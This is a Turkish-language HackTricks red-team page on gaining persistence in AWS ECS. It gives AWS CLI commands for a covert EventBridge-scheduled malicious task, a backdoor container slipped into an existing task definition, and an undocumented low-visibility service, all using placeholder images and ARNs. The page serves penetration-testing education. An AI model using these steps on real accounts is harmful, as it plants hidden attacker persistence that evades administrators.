AWS - ECS Persistence

htARTE (HackTricks AWS Kırmızı Takım Uzmanı) ile sıfırdan kahraman olmak için AWS hackleme öğrenin!

HackTricks'i desteklemenin diğer yolları:

ECS

Daha fazla bilgi için kontrol edin:

urlhttps://github.com/carlospolop/hacktricks-cloud/blob/tr/pentesting-cloud/aws-security/aws-hizmetleri/aws-ecs-enum.md

Gizli Periyodik ECS Görevi

TODO: Test

Bir saldırgan, Amazon EventBridge kullanarak kötü niyetli bir görevin periyodik olarak yürütülmesini planlamak için gizli bir periyodik ECS görevi oluşturabilir. Bu görev, keşif yapabilir, veri sızdırabilir veya AWS hesabında kalıcılık sağlayabilir.

# Create a malicious task definition
aws ecs register-task-definition --family "malicious-task" --container-definitions '[
{
"name": "malicious-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
}
]'

# Create an Amazon EventBridge rule to trigger the task periodically
aws events put-rule --name "malicious-ecs-task-rule" --schedule-expression "rate(1 day)"

# Add a target to the rule to run the malicious ECS task
aws events put-targets --rule "malicious-ecs-task-rule" --targets '[
{
"Id": "malicious-ecs-task-target",
"Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster",
"RoleArn": "arn:aws:iam::account-id:role/your-eventbridge-role",
"EcsParameters": {
"TaskDefinitionArn": "arn:aws:ecs:region:account-id:task-definition/malicious-task",
"TaskCount": 1
}
}
]'

Mevcut ECS Görev Tanımında Arka Kapı Konteyneri

TODO: Test

Bir saldırgan, mevcut bir ECS görev tanımına gizli bir arka kapı konteyneri ekleyebilir. Bu konteyner, meşru konteynerlerle birlikte çalışırken kalıcılık sağlamak ve kötü niyetli faaliyetler gerçekleştirmek için kullanılabilir.

# Update the existing task definition to include the backdoor container
aws ecs register-task-definition --family "existing-task" --container-definitions '[
{
"name": "legitimate-container",
"image": "legitimate-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
},
{
"name": "backdoor-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": false
}
]'

Belgeleştirilmemiş ECS Hizmeti

TODO: Test

Bir saldırgan, kötü niyetli bir görev çalıştıran bir belgeleştirilmemiş ECS hizmeti oluşturabilir. İstenen görev sayısını minimuma ayarlayarak ve günlüğü devre dışı bırakarak, yöneticilerin kötü niyetli hizmeti fark etmesi daha zor hale gelir.

# Create a malicious task definition
aws ecs register-task-definition --family "malicious-task" --container-definitions '[
{
"name": "malicious-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
}
]'

# Create an undocumented ECS service with the malicious task definition
aws ecs create-service --service-name "undocumented-service" --task-definition "malicious-task" --desired-count 1 --cluster "your-cluster"
AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenmek için htARTE (HackTricks AWS Kırmızı Takım Uzmanı)'ı kullanın!

HackTricks'ı desteklemenin diğer yolları:

Last updated